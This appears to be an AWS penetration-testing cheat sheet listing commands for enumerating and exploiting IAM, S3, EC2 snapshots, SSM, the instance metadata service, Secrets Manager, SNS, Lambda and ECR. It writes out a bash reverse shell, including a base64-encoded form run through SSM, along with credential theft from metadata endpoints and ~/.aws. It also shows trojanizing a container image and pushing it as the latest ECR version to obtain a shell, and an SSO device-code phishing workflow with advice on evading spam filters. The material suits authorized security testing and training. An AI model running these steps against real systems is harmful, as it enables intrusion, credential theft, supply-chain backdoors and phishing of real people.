PDF:
Authenticate to AWS with:
aws configure
OR env variables (if you’re authing as a resource)
rm -rf ./aws
export AWS_ACCESS_KEY_ID=<token>
export AWS_SECRET_ACCESS_KEY=<token>
export AWS_SESSION_TOKEN=<token>
OR
aws configure #add access and secret
aws configure set aws_session_token "<session token>"
Unset once you are done
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_SESSION_TOKEN
Prowler
git clone https://github.com/prowler-cloud/prowler.git
cd prowler
pip3 install -r requirements.txt
aws configure
./prowler -M html -V
Scoutsuite
git clone https://github.com/nccgroup/ScoutSuite.git
cd ScoutSuite
pip3 install -r requirements.txt
python3 scout.py aws --report-dir ./scoutsuite_report --debug
python3 scout.py aws --list-services
Check cred strength (MFA, policy, etc)
aws iam generate-credential-report
aws iam get-credential-report
Grab all roles you can assume
aws iam get-account-authorization-details
Confused Deputy
aws iam get-account-authorization-details
S3
URL Structure
http://[bucketname].s3-website-[region].amazonaws.com/
If you know an organization’s main domain name or naming convention, you can guess the names of potential S3 buckets. It’s a common practice to use predictable naming patterns
Google Dorks
Using google dorks to find exposed AWS secrets in buckets
site:http://amazonaws.com inurl:".s3.amazonaws.com/" "<Target_Company>”
site:.s3.amazonaws.com "Company" “<Target_Company>”
Intitle:index.of.bucket “<Target_Company>”
Third party tools:
Automated bucket discovery
cloud_enum -k samplekeyword -t 10 --disable-azure --disable-gcp
Append --no-sign-request
to commands to attempt without auth
aws s3api list-buckets
List objects with AWS CLI
aws s3 ls s3://[bucketname]
Upload objects with AWS CLI
aws s3 cp [localfile] s3://[bucketname]
We sync all bucket objects to local directory:
aws s3 sync s3://[bucketname] .
If IP is blocked/rate-limited
aws s3api get-object --bucket "[bucketname]" .
Other options:
aws s3 mv s3://[bucketname]/test-object localfile
aws s3 cp s3://[bucketname]/test-object localfile
If bucket exists but is reporting it doesn’t, your IP has been blocklisted, use s3api
If sync is rate-limited
list object versions with s3api
aws s3api list-object-versions --bucket [bucketname]
if version is not latest for a given object, dump all versions of it with script:
IAM Enumeration
Get user info & account ID
aws sts get-caller-identity
Get more user info:
aws iam get-user --user-name <breached_username>
Get attached policies
aws iam list-user-policies -–user-name <breached_username>
Return in-line policies
aws iam list-attached-user-policies --user-name <breached_username>
Return specific policy
aws iam get-user-policy --user-name <breached_username> --policy-name <policyname>
Automated tools
Pacu
run iam__enum_permissions
Elastic Compute & Elastic Block Storage
List instances
aws ec2 describe-instances
List EBS volumes
aws ec2 describe-volumes
Describe EBS snapshots
aws ec2 describe-snapshots --region us-east-1 --owner-id
Describe snapshots owned by a particular user
aws ec2 describe-snapshots --region us-east-2 --owner-id [AWS-ACCOUNT-ID]
List the publicly available and the one that you may have access to EC2 snapshots:
aws ec2 describe-snapshots --region <region>
Automated with Pacu:
python3 cli.py
import keys
import_keys --all
list modules
list
ebs module
run ebs__enum_volumes_snapshots
Download snapshots with dssnap
dsnap --region us-east-2 list
dsnap --region us-east-2 get <SNAPSHOTID>
navigate to img and mount with docker
sudo IMAGE=<IMG LOCATION> make docker/run
sudo IMAGE=home/cb7247/snap-085d36d72aafac2b4.img make docker/run
look around file system try to find some loot
If you get access to an ec2 instance, AWS credentials are located ~/.aws
cat config && cat credentials
If you have an IAM policy that allows you to describe userData from ec2s, use a script to pull userData from all ec2s and check for loot.
SSM Enumeration
Check if you have an IAM policy that allows you to execute shell commands via SSM
aws iam list-attached-user-policies --user-name <USER>
check specific policy via arn
aws iam get-policy --policy-arn arn:aws:iam::[AWS-ACCOUNT-ID]:policy/AllowSSMRunShellCommands
We can see "DefaultVersionId": "v1"
is the policy version, we query against the policy version
aws iam get-policy-version --policy-arn arn:aws:iam::[AWS-ACCOUNT-ID]:policy/AllowSSMRunShellCommands --version-id v1
We see an ec2 id listed as a resource against the policy
arn:aws:ec2:us-east-1:[AWS-ACCOUNT-ID]:instance/i-09b50e5d737869b05
We can look for other “devmachines” as referenced in the description of the initial policy and we can query for the known ec2 id.
You can launch command exec against the resulting instances via SSM
SSM Command Execution
aws ssm send-command    Â
--instance-ids "instance-ID" Â Â Â Â
--document-name "AWS-RunShellScript" Â Â Â Â
--comment "comments" Â Â Â Â
--parameters '{"commands":["Bash Script Here"]}' Â Â Â Â
--output text
bash -i >& /dev/tcp/10.0.10.100/8443 0>&1
base64 first to avoid interpretation issues
echo "bash -c 'bash -i >& /dev/tcp/10.0.10.47/8443 0>&1'" | base64
aws ssm send-command
    --instance-ids "i-09b50e5d737869b05"
    --document-name "AWS-RunShellScript"
    --comment "ReverseShell"
    --parameters '{"commands":["echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEwMC84NDQzIDA+JjEnCg== | base64 -d | bash"]}'
    --output text
You should get a shell back
If command fails, learn why with:
aws ssm list-command-invocations
--instance-id "i-09b50e5d737869b05"
--command-id "cb542971-efb0-4f08-9281-9ca010a4c0ef"
--details
Instance MetaData Service (IMDSv1 & IMDSv12)
Check env vars in any machine you have access, identify potential metadata endpoints
IMDSv1
Retrieve the instance’s metadata:
curl http://169.254.169.254/latest/meta-data/
Get the instance’s hostname:
curl http://169.254.169.254/latest/meta-data/hostname
Fetch the instance’s AMI ID:
curl http://169.254.169.254/latest/meta-data/ami-id
Find out the instance type:
curl http://169.254.169.254/latest/meta-data/instance-type
Determine the public IPv4 address assigned to the instance:
curl http://169.254.169.254/latest/meta-data/public-ipv4
Retrieve security groups associated with the instance:
curl http://169.254.169.254/latest/meta-data/security-groups
Acquire the IAM role credentials (if a role is attached to the instance):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
If you have an attached policy like AllowEC2ToReadSecrets, you can read them and look for loot:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AllowEC2ToReadSecrets
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/AllowEC2ToReadSecrets
Secrets Manager
Check if you have secrets manager perms & list secret managers
aws secretsmanager list-secrets --region us-east-1
Check for secrets:
aws secretsmanager get-secret-value --secret-id <NAME> --region us-east-1
Take note of sensitive ARNs (like SNS) (send emails and stuff)
arn:aws:sns:useast1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01
aws secretsmanager list-secrets
Lets read the stored secrets with get-secret-value
aws secretsmanager get-secret-value --secret-id DataVaultAnalyticaSecretMgr
Simple Notification Service
Subscribe to with you’re email to receive inter-org SNS communications (and look for loot)
- You need the SNS Topic ARN
- Subscribe:
- Monitor for emails with loot
arn:aws:sns:useast1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01 --region us-east-1 --protocol email --notification-endpoint jake@jacobh.io
Lambda Functions
List lambda functions
aws lambda list-functions
Get more info
aws lambda get-function --function-name cmdchecker-dev-app
Download the function from the URL "Location":
curl "https://prod-iad-c1-djusa-tasks.s3.us-east-1.amazonaws.com/snapshots/[AWS-ACCOUNT-ID]/cmdchecker-dev-app-d75e60fd-f173-40e8-a4b9-ae27de4cff0e?versionId=8mSADta7FRIGuKjKwlitnVFmfQagRBYx&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEAMaCXVzLWVhc3QtMSJHMEUCIQDjKthCPRBRi9xj58tji%2FoN2AzYoHX9C%2BPHEzOnvaByfgIgCbHw0shrMZpFf%2F9IltAmem8g5x0uhx297q4dr1apyhAquQUIHBAEGgw0NzkyMzMwMjUzNzkiDFkt4lJL5vU2rwtPtSqWBfESYHMf5G4YxAhWRRRgA7ZK6cfbKpFq0wsKfLkzuPVB2vTeN5i%2BaA6f%2FpJlLKFPR9RzcLNLHMky96sIwkQXR6AM7AcpBPnObKAxyAu3yUPRFBzCGBDdoR9ULjhy%2BqjAcE6f9PeZCFzVwsWfAvepA%2FPgMlUg9wPhMBjrySl07JuEwexUd5M40YDTz%2BfQcmqR48kGgJB12fMPUyIeGhL4LpoZhtnqwwr4dP%2FEV4Cjcg%2FkSc4oDPMVvH7zudgp5McVqYCVtm8QxafuxgZSFs2TKkezBVUOaZWOQOkca0JxJuwm4wftrvPvVTzy58uyOJCUCaRNekfxXBKmzOKLRw1dMJdtWo%2FEzOJjNVXHRPlYInD%2BSDqmI3%2FEbyBvzH7flnbfesnJ6QaAGJyb95mKdvEYZHOJnZE8JnB1uMH7Eu8%2FBt8vjbF1cfxJIDY88AnaVhAmd%2FLntes5XWIyX0SDcqOwOprg2p1bcWIx3PT4rXP9ot58b9nCi%2FlxYjo%2Fr99lit0KWXoxWcx5LBM1UKWNq9G4A8hm5RzEaaAxX8SivzBBPpNvc%2FeqsYXuy9ab5v6M5iuEEcs4FVBm8LDiZWmS%2FrAkvL0PG6k64FkU2qEAJS9KseUXtipJgrPryc0eUgJ5DQ%2B4ztvC%2F0FNUFHS5r2irl6lfxzVjSaMnN7%2BwuAj1Q5CpYwcdChd3SKftkDQwO7eXRrD%2BXSs%2BipElpCJxeg2mp4a0czxFxq9BPdjq%2FIMaZplagN2by8wrj4aLHO07X%2FnD4BbrL98e58yBDSshEv5ZO9Z%2BYfFKlzT3FSwvCU0BYdCdE6uYwkwpJynJRDfIg6A3I9w%2FhaHYCTuVqeo%2FnUzl%2Flb3uuGcgI80E7mdCwm52sif2O6aLseeJeqMKi5uLYGOrEBrYHhJ73o3FVlXF8xXRMuVUTFju%2BFRIehmOnBBErJT%2BMYbtVPoV4wutG1iQLEFizFDhw0%2BGbddBcMtWuDd0ItAQ0sZ5b%2F3VSSYyWAw59RbQo5bqI5tC0yipw1LGXbsC9Oks04FmL%2FRSJ%2FAxmr5lAONXfYOAPT2UUtIjf2nciakBtly3aUnK7FEeTFIhiwnvKrOJWM00qxicaXFnuzrcnyZAia9eOh1M8TSFTHwUFnO1XZ&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20240827T192212Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAW7FEDUVR3SU7YV2G%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=611c84ee73847ac9b478a62165091aca16d919fea89513e2a946e2d6f48729da" -o lambda.zip
Ravage the code and config files for loot.
Find Lambda execution endpoint
aws lambda get-policy --function-name cmdchecker-dev-app
#OR if you have access to API Gateway run:
aws apigateway get-rest-apis
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"cmdchecker-dev-AppLambdaPermissionApiGateway-vHNHjx898ROL\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-east-1:[AWS-ACCOUNT-ID]:function:cmdchecker-dev-app\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9/*/*\"}}}]}",
"RevisionId": "829c9cea-4255-4785-b318-dd7bd70af3fe"
}
So, from the output of the first command, we can find useful details and build the exposed URL. The Lambda URL is divided into the following parts:
https://[NAME].execute-api.[REGION].amazonaws.com
arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9
From the output “arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9” we can find the name and the region which are:
- Name: rsd847a1e9
- Region: us-east-1
We can build the function url:
https://rsd847a1e9.execute-api.us-east-1.amazonaws.com
ECR/EKS
List image repositories
aws ecr describe-repositories
List specific repository info (images)
aws ecr describe-images --repository-name [reponame]
Backdoor an image with dockerscan
git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install
Grab ubunut
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu_original
dockerscan image modify trojanize ubuntu_original -l <IP_Addr> -p <PORT> -o alpine_infected
Now we can force our backdoored image to be the latest version in ECS
Tag the imager as :latest
sudo docker tag alpine_infected:latest [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com/[REPONAME]:latest
sudo docker images
Before we proceed and push our tagged image to an ECR Repository, execute the ECR get login password command. The aws ecr get-login-password command is used to retrieve an authentication token that can be used to log in to an Amazon Elastic Container Registry (ECR) registry within AWS.
aws ecr get-login-password --region us-east-1 | sudo docker login --username AWS --password-stdin [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com
ncat -nvlp 8989
sudo docker push [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com/[REPONAME]:latest
Wait for a node to grab latest img version and run it. - you receive a shell
When an attacker successfully compromises a Kubernetes environment, their initial command often involves running “env” to inspect environment variables. This is a common first step because, unfortunately, some DevOps practices involve storing sensitive information like cleartext keys directly as environment variables instead of securely managing them in a secret manager.
env
Phishing via SSO
Get tool
$ python main.py --help
usage: main.py [-h] -u START_URL -r REGION [-i SSO_TOKEN_FILE] [-o OUTPUT_FILE]
optional arguments:
-h, --help show this help message and exit
-u START_URL, --sso-start-url START_URL
AWS SSO start URL. Example: https://mycompany.awssapps.com/start (default: None)
-r REGION, --sso-region REGION
AWS region in which AWS SSO is configured (e.g. us-east-1) (default: None)
-i SSO_TOKEN_FILE, --sso-token-file SSO_TOKEN_FILE
File to read the AWS SSO token from. If provided, no device code URL is generated (default: None)
-o OUTPUT_FILE File to write the retrieved AWS SSO token (default: None)
It will generate a url:
https://device.sso.us-east-1.amazonaws.com/?user_code=PPSR-PVFH
Send URL to victim and wait
In order to avoid your email being sent to the Junk folder, the sender email address should be from one of the following Email providers: gmail.com, hotmail.com, hotmail.co.ukaol.com, protonmail.com, icloud.com, yahoo.com, outlook.com, ymail.com
Wait for 5-6 minutes and a response will be received. Once you received: “Successfully retrieved AWS SSO Token” click enter two times to receive session and auth tokens.
This token will only be valid for 8 hours